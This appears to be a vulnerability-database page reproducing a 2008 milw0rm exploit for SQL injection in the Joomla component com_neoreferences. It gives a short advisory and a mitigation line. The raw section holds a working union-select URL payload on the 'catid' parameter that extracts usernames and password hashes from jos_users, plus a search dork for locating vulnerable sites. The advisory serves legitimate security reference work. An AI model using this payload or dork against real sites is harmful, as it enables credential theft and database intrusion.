header-logo
Suggest Exploit
vendor:
NeoReferences
by:
S@BUN
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: NeoReferences
Affected Version From: 1.3.2001
Affected Version To: 1.3.2001
Patch Exists: YES
Related CWE: N/A
CPE: a:neojoomla:neoreferences:1.3.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla SQL Injection (com_neoreferences)

An attacker can exploit a SQL injection vulnerability in the com_neoreferences component of Joomla! to execute arbitrary SQL commands. The vulnerability is due to insufficient sanitization of user-supplied input to the 'catid' parameter of the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands to the vulnerable application. Successful exploitation could result in unauthorized access to sensitive information or allow an attacker to modify data in the back-end database.

Mitigation:

Upgrade to the latest version of Joomla! or apply the patch from the vendor.
Source

Exploit-DB raw data:

#########################################################################
#
# joomla SQL Injection(com_neoreferences)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################
#
# DorKs 1 : allinurl: "com_neoreferences"
#
########################################################################
EXPLOIT :

index.php?option=com_neoreferences&Itemid=27&catid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%20where%20user_id=1=1/*


#########################################################################
# S@BUN                           www.hackturkiye.com                       S@BUN
#########################################################################
# S@BUN                              GOOD LUCKY                                S@BUN
#########################################################################

added notes:
	<name>NeoReferences</name>
	<creationDate>December 2006</creationDate>
	<author>NeoJoomla</author>
	<license>Released under CREATIVE COMMONS License</license>
	<copyright>Copyright (C) 2006 Neoweb</copyright>

	<authorEmail>support@neojoomla.com</authorEmail>
	<authorUrl>www.neojoomla.com</authorUrl>
	<version>1.3.1</version>
	<description><![CDATA[NeoReferences is component which enables you to manage your current and future references by category and thanks to a system of thumbnails clear and very visual!
You can add an image for each reference which will be resized by the component, just click on it to see the complete view.<br />Developped by NeoJoomla.]]></description>

# milw0rm.com [2008-02-01]